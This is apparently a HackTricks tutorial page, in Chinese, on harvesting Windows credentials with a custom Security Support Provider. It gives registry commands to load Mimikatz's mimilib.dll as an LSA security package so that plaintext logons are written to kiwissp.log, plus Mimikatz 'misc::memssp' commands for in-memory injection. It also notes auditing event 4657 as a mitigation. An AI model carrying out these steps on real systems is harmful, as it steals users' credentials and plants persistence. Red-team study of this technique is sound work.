Custom SSP

Reading time: 3 minutes

tip

学习和实践 AWS 黑客技术:HackTricks Training AWS Red Team Expert (ARTE)
学习和实践 GCP 黑客技术:HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术:HackTricks Training Azure Red Team Expert (AzRTE)

支持 HackTricks

Custom SSP

了解什么是 SSP (Security Support Provider) 在这里。
您可以创建您自己的 SSP捕获明文形式使用的凭据以访问机器。

Mimilib

您可以使用 Mimikatz 提供的 mimilib.dll 二进制文件。这将把所有凭据以明文记录在一个文件中。
将 dll 放入 C:\Windows\System32\
获取现有 LSA 安全包的列表:

attacker@target
PS C:\> reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"

HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa
Security Packages    REG_MULTI_SZ    kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u

mimilib.dll 添加到安全支持提供程序列表(安全包):

bash
reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages"

在重启后,所有凭据可以在 C:\Windows\System32\kiwissp.log 中以明文形式找到。

在内存中

您还可以直接使用 Mimikatz 在内存中注入此内容(请注意,这可能有点不稳定/无法工作):

bash
privilege::debug
misc::memssp

这不会在重启后存活。

缓解措施

事件 ID 4657 - 审计创建/更改 HKLM:\System\CurrentControlSet\Control\Lsa\SecurityPackages

tip

学习和实践 AWS 黑客技术:HackTricks Training AWS Red Team Expert (ARTE)
学习和实践 GCP 黑客技术:HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术:HackTricks Training Azure Red Team Expert (AzRTE)

支持 HackTricks